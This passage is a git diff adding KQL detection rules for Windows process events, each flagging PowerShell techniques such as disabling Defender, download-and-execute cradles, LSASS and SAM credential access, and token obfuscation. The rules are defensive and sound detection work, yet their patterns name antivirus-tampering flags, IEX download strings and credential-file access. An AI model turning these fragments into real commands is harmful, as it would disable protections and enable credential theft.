+| where ((ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains "DisableArchiveScanning " or ProcessCommandLine contains "DisableRealtimeMonitoring " or ProcessCommandLine contains "DisableIOAVProtection " or ProcessCommandLine contains "DisableBehaviorMonitoring " or ProcessCommandLine contains "DisableBlockAtFirstSeen " or ProcessCommandLine contains "DisableCatchupFullScan " or ProcessCommandLine contains "DisableCatchupQuickScan ") and (ProcessCommandLine contains "$true" or ProcessCommandLine contains " 1 ")) or ((ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBJAE8AQQBWAFAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUASQBPAEEAVgBQAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGUAaABhAHYAaQBvAHIATQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBlAGgAYQB2AGkAbwByAE0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAZQBoAGEAdgBpAG8AcgBNAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBCAGwAbwBjAGsAQQB0AEYAaQByAHMAdABTAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAQgBsAG8AYwBrAEEAdABGAGkAcgBzAHQAUwBlAGUAbgAgA" or ProcessCommandLine contains "EAGkAcwBhAGIAbABlAEIAbABvAGMAawBBAHQARgBpAHIAcwB0AFMAZQBlAG4AIA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQByAGUAYQBsAHQAaQBtAGUAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAcgBlAGEAbAB0AGkAbQBlAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAHIAZQBhAGwAdABpAG0AZQBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBpAG8AYQB2AHAAcgBvAHQAZQBjAHQAaQBvAG4AIA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAaQBvAGEAdgBwAHIAbwB0AGUAYwB0AGkAbwBuACAA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGkAbwBhAHYAcAByAG8AdABlAGMAdABpAG8AbgAgA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGUAaABhAHYAaQBvAHIAbQBvAG4AaQB0AG8AcgBpAG4AZwAgA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBlAGgAYQB2AGkAbwByAG0AbwBuAGkAdABvAHIAaQBuAGcAIA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAZQBoAGEAdgBpAG8AcgBtAG8AbgBpAHQAbwByAGkAbgBnACAA" or ProcessCommandLine contains "ZABpAHMAYQBiAGwAZQBiAGwAbwBjAGsAYQB0AGYAaQByAHMAdABzAGUAZQBuACAA" or ProcessCommandLine contains "QAaQBzAGEAYgBsAGUAYgBsAG8AYwBrAGEAdABmAGkAcgBzAHQAcwBlAGUAbgAgA" or ProcessCommandLine contains "kAGkAcwBhAGIAbABlAGIAbABvAGMAawBhAHQAZgBpAHIAcwB0AHMAZQBlAG4AIA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAEYAdQBsAGwAUwBjAGEAbgA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBDAGEAdABjAGgAdQBwAFEAdQBpAGMAawBTAGMAYQBuAA" or ProcessCommandLine contains "RABpAHMAYQBiAGwAZQBBAHIAYwBoAGkAdgBlAFMAYwBhAG4AbgBpAG4AZwA") or (ProcessCommandLine contains "ZGlzYWJsZWFyY2hpdmVzY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVhcmNoaXZlc2Nhbm5pbmcg" or ProcessCommandLine contains "kaXNhYmxlYXJjaGl2ZXNjYW5uaW5nI" or ProcessCommandLine contains "RGlzYWJsZUFyY2hpdmVTY2FubmluZy" or ProcessCommandLine contains "Rpc2FibGVBcmNoaXZlU2Nhbm5pbmcg" or ProcessCommandLine contains "EaXNhYmxlQXJjaGl2ZVNjYW5uaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJlaGF2aW9ybW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGViZWhhdmlvcm1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlYmVoYXZpb3Jtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZUJlaGF2aW9yTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVCZWhhdmlvck1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlQmVoYXZpb3JNb25pdG9yaW5nI" or ProcessCommandLine contains "ZGlzYWJsZWJsb2NrYXRmaXJzdHNlZW4g" or ProcessCommandLine contains "Rpc2FibGVibG9ja2F0Zmlyc3RzZWVuI" or ProcessCommandLine contains "kaXNhYmxlYmxvY2thdGZpcnN0c2Vlbi" or ProcessCommandLine contains "RGlzYWJsZUJsb2NrQXRGaXJzdFNlZW4g" or ProcessCommandLine contains "Rpc2FibGVCbG9ja0F0Rmlyc3RTZWVuI" or ProcessCommandLine contains "EaXNhYmxlQmxvY2tBdEZpcnN0U2Vlbi" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBmdWxsc2Nhbi" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwZnVsbHNjYW4g" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cGZ1bGxzY2FuI" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBGdWxsU2Nhbi" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwRnVsbFNjYW4g" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cEZ1bGxTY2FuI" or ProcessCommandLine contains "ZGlzYWJsZWNhdGNodXBxdWlja3NjYW4g" or ProcessCommandLine contains "Rpc2FibGVjYXRjaHVwcXVpY2tzY2FuI" or ProcessCommandLine contains "kaXNhYmxlY2F0Y2h1cHF1aWNrc2Nhbi" or ProcessCommandLine contains "RGlzYWJsZUNhdGNodXBRdWlja1NjYW4g" or ProcessCommandLine contains "Rpc2FibGVDYXRjaHVwUXVpY2tTY2FuI" or ProcessCommandLine contains "EaXNhYmxlQ2F0Y2h1cFF1aWNrU2Nhbi" or ProcessCommandLine contains "ZGlzYWJsZWlvYXZwcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVpb2F2cHJvdGVjdGlvbi" or ProcessCommandLine contains "kaXNhYmxlaW9hdnByb3RlY3Rpb24g" or ProcessCommandLine contains "RGlzYWJsZUlPQVZQcm90ZWN0aW9uI" or ProcessCommandLine contains "Rpc2FibGVJT0FWUHJvdGVjdGlvbi" or ProcessCommandLine contains "EaXNhYmxlSU9BVlByb3RlY3Rpb24g" or ProcessCommandLine contains "ZGlzYWJsZXJlYWx0aW1lbW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVyZWFsdGltZW1vbml0b3Jpbmcg" or ProcessCommandLine contains "kaXNhYmxlcmVhbHRpbWVtb25pdG9yaW5nI" or ProcessCommandLine contains "RGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZy" or ProcessCommandLine contains "Rpc2FibGVSZWFsdGltZU1vbml0b3Jpbmcg" or ProcessCommandLine contains "EaXNhYmxlUmVhbHRpbWVNb25pdG9yaW5nI"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_defender_exclusion.kql b/KQL/rules/windows/process_creation/powershell_defender_exclusion.kql
new file mode 100644
index 00000000..4dd05231
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_defender_exclusion.kql
@@ -0,0 +1,13 @@
+// Title: Powershell Defender Exclusion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-04-29
+// Level: medium
+// Description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Possible Admin Activity
+//   - Other Cmdlets that may use the same parameters
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Add-MpPreference " or ProcessCommandLine contains "Set-MpPreference ") and (ProcessCommandLine contains " -ExclusionPath " or ProcessCommandLine contains " -ExclusionExtension " or ProcessCommandLine contains " -ExclusionProcess " or ProcessCommandLine contains " -ExclusionIpAddress ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql b/KQL/rules/windows/process_creation/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
new file mode 100644
index 00000000..191d79af
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_defender_threat_severity_default_action_set_to_allow_or_noaction_.kql
@@ -0,0 +1,14 @@
+// Title: PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction'
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-11
+// Level: high
+// Description: Detects the use of PowerShell to execute the 'Set-MpPreference' cmdlet to configure Windows Defender's threat severity default action to 'Allow' (value '6') or 'NoAction' (value '9').
+// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level.
+// An attacker might use this technique via the command line to bypass defenses before executing payloads.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Highly unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-LowThreatDefaultAction" or ProcessCommandLine contains "-ModerateThreatDefaultAction" or ProcessCommandLine contains "-HighThreatDefaultAction" or ProcessCommandLine contains "-SevereThreatDefaultAction" or ProcessCommandLine contains "-ltdefac " or ProcessCommandLine contains "-mtdefac " or ProcessCommandLine contains "-htdefac " or ProcessCommandLine contains "-stdefac ") and ProcessCommandLine contains "Set-MpPreference" and (ProcessCommandLine contains "Allow" or ProcessCommandLine contains "6" or ProcessCommandLine contains "NoAction" or ProcessCommandLine contains "9")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_download_and_execution_cradles.kql b/KQL/rules/windows/process_creation/powershell_download_and_execution_cradles.kql
new file mode 100644
index 00000000..54afef52
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_download_and_execution_cradles.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Download and Execution Cradles
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-24
+// Level: high
+// Description: Detects PowerShell download and execution cradles.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+//   - Some PowerShell installers were seen using similar combinations. Apply filters accordingly
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".DownloadString(" or ProcessCommandLine contains ".DownloadFile(" or ProcessCommandLine contains "Invoke-WebRequest " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Invoke-RestMethod " or ProcessCommandLine contains "irm ") and (ProcessCommandLine contains ";iex $" or ProcessCommandLine contains "| IEX" or ProcessCommandLine contains "|IEX " or ProcessCommandLine contains "I`E`X" or ProcessCommandLine contains "I`EX" or ProcessCommandLine contains "IE`X" or ProcessCommandLine contains "iex " or ProcessCommandLine contains "IEX (" or ProcessCommandLine contains "IEX(" or ProcessCommandLine contains "Invoke-Expression")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_download_pattern.kql b/KQL/rules/windows/process_creation/powershell_download_pattern.kql
new file mode 100644
index 00000000..99ceb540
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_download_pattern.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Download Pattern
+// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects a Powershell process that contains download commands in its command line string
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "string(" or ProcessCommandLine contains "file(") and (ProcessCommandLine contains "new-object" and ProcessCommandLine contains "net.webclient)." and ProcessCommandLine contains "download")) and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_executed_from_headless_conhost_process.kql b/KQL/rules/windows/process_creation/powershell_executed_from_headless_conhost_process.kql
new file mode 100644
index 00000000..aae7fe6a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_executed_from_headless_conhost_process.kql
@@ -0,0 +1,11 @@
+// Title: Powershell Executed From Headless ConHost Process
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: medium
+// Description: Detects the use of powershell commands from headless ConHost window.
+// The "--headless" flag hides the windows from the user upon execution.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1059.003, attack.t1564.003
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "--headless" and ProcessCommandLine contains "powershell") and (FolderPath endswith "\\conhost.exe" or ProcessVersionInfoOriginalFileName =~ "CONHOST.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_execution_with_potential_decryption_capabilities.kql b/KQL/rules/windows/process_creation/powershell_execution_with_potential_decryption_capabilities.kql
new file mode 100644
index 00000000..fc099042
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_execution_with_potential_decryption_capabilities.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Execution With Potential Decryption Capabilities
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-30
+// Level: high
+// Description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Get-ChildItem " or ProcessCommandLine contains "dir " or ProcessCommandLine contains "gci " or ProcessCommandLine contains "ls ") and (ProcessCommandLine contains "Get-Content " or ProcessCommandLine contains "gc " or ProcessCommandLine contains "cat " or ProcessCommandLine contains "type " or ProcessCommandLine contains "ReadAllBytes") and ((ProcessCommandLine contains " ^| " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "-Recurse" and ProcessCommandLine contains "-Skip ") or (ProcessCommandLine contains " -ExpandProperty " and ProcessCommandLine contains "*.lnk" and ProcessCommandLine contains "WriteAllBytes" and ProcessCommandLine contains " .length ")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_get_clipboard_cmdlet_via_cli.kql b/KQL/rules/windows/process_creation/powershell_get_clipboard_cmdlet_via_cli.kql
new file mode 100644
index 00000000..ce241746
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_get_clipboard_cmdlet_via_cli.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Get-Clipboard Cmdlet Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Get-Clipboard"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_get_process_lsass.kql b/KQL/rules/windows/process_creation/powershell_get_process_lsass.kql
new file mode 100644
index 00000000..7350a45e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_get_process_lsass.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Get-Process LSASS
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-04-23
+// Level: high
+// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Get-Process lsas" or ProcessCommandLine contains "ps lsas" or ProcessCommandLine contains "gps lsas"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_inline_execution_from_a_file.kql b/KQL/rules/windows/process_creation/powershell_inline_execution_from_a_file.kql
new file mode 100644
index 00000000..87aaddb7
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_inline_execution_from_a_file.kql
@@ -0,0 +1,10 @@
+// Title: Powershell Inline Execution From A File
+// Author: frack113
+// Date: 2022-12-25
+// Level: medium
+// Description: Detects inline execution of PowerShell code from a file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "iex " or ProcessCommandLine contains "Invoke-Expression " or ProcessCommandLine contains "Invoke-Command " or ProcessCommandLine contains "icm ") and ProcessCommandLine contains " -raw" and (ProcessCommandLine contains "cat " or ProcessCommandLine contains "get-content " or ProcessCommandLine contains "type ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql b/KQL/rules/windows/process_creation/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
new file mode 100644
index 00000000..44476920
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_msi_install_via_windowsinstaller_com_from_remote_location.kql
@@ -0,0 +1,13 @@
+// Title: PowerShell MSI Install via WindowsInstaller COM From Remote Location
+// Author: Meroujan Antonyan (vx3r)
+// Date: 2025-06-05
+// Level: medium
+// Description: Detects the execution of PowerShell commands that attempt to install MSI packages via the
+// Windows Installer COM object (`WindowsInstaller.Installer`) hosted remotely.
+// This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality.
+// And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-ComObject" and ProcessCommandLine contains "InstallProduct(") and ((FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "http" or ProcessCommandLine contains "\\\\")) and (not((ProcessCommandLine contains "://127.0.0.1" or ProcessCommandLine contains "://localhost")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_sam_copy.kql b/KQL/rules/windows/process_creation/powershell_sam_copy.kql
new file mode 100644
index 00000000..7852a2fb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_sam_copy.kql
@@ -0,0 +1,13 @@
+// Title: PowerShell SAM Copy
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-29
+// Level: high
+// Description: Detects suspicious PowerShell scripts accessing SAM hives
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+//   - Some rare backup scenarios
+//   - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\HarddiskVolumeShadowCopy" and ProcessCommandLine contains "System32\\config\\sam") and (ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "cp $_." or ProcessCommandLine contains "cpi $_." or ProcessCommandLine contains "copy $_." or ProcessCommandLine contains ".File]::Copy(")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_script_change_permission_via_set_acl.kql b/KQL/rules/windows/process_creation/powershell_script_change_permission_via_set_acl.kql
new file mode 100644
index 00000000..d2600bfa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_script_change_permission_via_set_acl.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Script Change Permission Via Set-Acl
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects PowerShell execution to set the ACL of a file or a folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject " and ProcessCommandLine contains "-Path ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_script_run_in_appdata.kql b/KQL/rules/windows/process_creation/powershell_script_run_in_appdata.kql
new file mode 100644
index 00000000..c45b5f25
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_script_run_in_appdata.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Script Run in AppData
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2019-01-09
+// Level: medium
+// Description: Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Administrative scripts
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "powershell.exe" or ProcessCommandLine contains "\\powershell" or ProcessCommandLine contains "\\pwsh" or ProcessCommandLine contains "pwsh.exe") and ((ProcessCommandLine contains "Local\\" or ProcessCommandLine contains "Roaming\\") and (ProcessCommandLine contains "/c " and ProcessCommandLine contains "\\AppData\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_set_acl_on_windows_folder.kql b/KQL/rules/windows/process_creation/powershell_set_acl_on_windows_folder.kql
new file mode 100644
index 00000000..350ecce2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_set_acl_on_windows_folder.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Set-Acl On Windows Folder
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-18
+// Level: high
+// Description: Detects PowerShell scripts to set the ACL to a file in the Windows folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Set-Acl " and ProcessCommandLine contains "-AclObject ") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "-Path \"C:\\Windows" or ProcessCommandLine contains "-Path 'C:\\Windows" or ProcessCommandLine contains "-Path %windir%" or ProcessCommandLine contains "-Path $env:windir") and (ProcessCommandLine contains "FullControl" or ProcessCommandLine contains "Allow")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_token_obfuscation_process_creation.kql b/KQL/rules/windows/process_creation/powershell_token_obfuscation_process_creation.kql
new file mode 100644
index 00000000..7904ae91
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_token_obfuscation_process_creation.kql
@@ -0,0 +1,10 @@
+// Title: Powershell Token Obfuscation - Process Creation
+// Author: frack113
+// Date: 2022-12-27
+// Level: high
+// Description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.009
+
+DeviceProcessEvents
+| where (ProcessCommandLine matches regex "\\w+`(\\w+|-|.)`[\\w+|\\s]" or ProcessCommandLine matches regex ""(\\{\\d\\})+"\\s*-f" or ProcessCommandLine matches regex "(?i)\\$\\{`?e`?n`?v`?:`?p`?a`?t`?h`?\\}") and (not(ProcessCommandLine contains "${env:path}"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/powershell_web_access_feature_enabled_via_dism.kql b/KQL/rules/windows/process_creation/powershell_web_access_feature_enabled_via_dism.kql
new file mode 100644
index 00000000..fb4dba3f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/powershell_web_access_feature_enabled_via_dism.kql
@@ -0,0 +1,12 @@
+// Title: PowerShell Web Access Feature Enabled Via DISM
+// Author: Michael Haag
+// Date: 2024-09-03
+// Level: high
+// Description: Detects the use of DISM to enable the PowerShell Web Access feature, which could be used for remote access and potential abuse
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1548.002
+// False Positives:
+//   - Legitimate PowerShell Web Access installations by administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "WindowsPowerShellWebAccess" and ProcessCommandLine contains "/online" and ProcessCommandLine contains "/enable-feature") and (FolderPath endswith "\\dism.exe" or ProcessVersionInfoOriginalFileName =~ "DISM.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql b/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql
new file mode 100644
index 00000000..e4806476
--- /dev/null
+++ b/KQL/rules/windows/process_creation/ppl_tampering_via_werfaultsecure.kql
@@ -0,0 +1,17 @@
+// Title: PPL Tampering Via WerFaultSecure
+// Author: Jason (https://github.com/0xbcf)
+// Date: 2025-09-23
+// Level: high
+// Description: Detects potential abuse of WerFaultSecure.exe to dump Protected Process Light (PPL) processes like LSASS or to freeze security solutions (EDR/antivirus).
+// This technique is used by tools such as EDR-Freeze and WSASS to bypass PPL protections and access sensitive information or disable security software.
+// Distinct command line patterns help identify the specific tool:
+// - WSASS usage typically shows: "WSASS.exe WerFaultSecure.exe [PID]" in ParentCommandLine
+// - EDR-Freeze usage typically shows: "EDR-Freeze_[version].exe [PID] [timeout]" in ParentCommandLine
+// Legitimate debugging operations using WerFaultSecure are rare in production environments and should be investigated.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001, attack.credential-access, attack.t1003.001
+// False Positives:
+//   - Legitimate usage of WerFaultSecure for debugging purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /h " and ProcessCommandLine contains " /pid " and ProcessCommandLine contains " /tid " and ProcessCommandLine contains " /encfile " and ProcessCommandLine contains " /cancel " and ProcessCommandLine contains " /type " and ProcessCommandLine contains " 268310") and (FolderPath endswith "\\WerFaultSecure.exe" or ProcessVersionInfoOriginalFileName =~ "WerFaultSecure.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/printbrm_zip_creation_of_extraction.kql b/KQL/rules/windows/process_creation/printbrm_zip_creation_of_extraction.kql
new file mode 100644
index 00000000..2ad7a4d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/printbrm_zip_creation_of_extraction.kql
@@ -0,0 +1,10 @@
+// Title: PrintBrm ZIP Creation of Extraction
+// Author: frack113
+// Date: 2022-05-02
+// Level: high
+// Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -f" and ProcessCommandLine contains ".zip") and FolderPath endswith "\\PrintBrm.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/private_keys_reconnaissance_via_commandline_tools.kql b/KQL/rules/windows/process_creation/private_keys_reconnaissance_via_commandline_tools.kql
new file mode 100644
index 00000000..661a302c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/private_keys_reconnaissance_via_commandline_tools.kql
@@ -0,0 +1,10 @@
+// Title: Private Keys Reconnaissance Via CommandLine Tools
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-20
+// Level: medium
+// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".key" or ProcessCommandLine contains ".pgp" or ProcessCommandLine contains ".gpg" or ProcessCommandLine contains ".ppk" or ProcessCommandLine contains ".p12" or ProcessCommandLine contains ".pem" or ProcessCommandLine contains ".pfx" or ProcessCommandLine contains ".cer" or ProcessCommandLine contains ".p7b" or ProcessCommandLine contains ".asc") and ((ProcessCommandLine contains "dir " and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or (ProcessCommandLine contains "Get-ChildItem " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) or (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
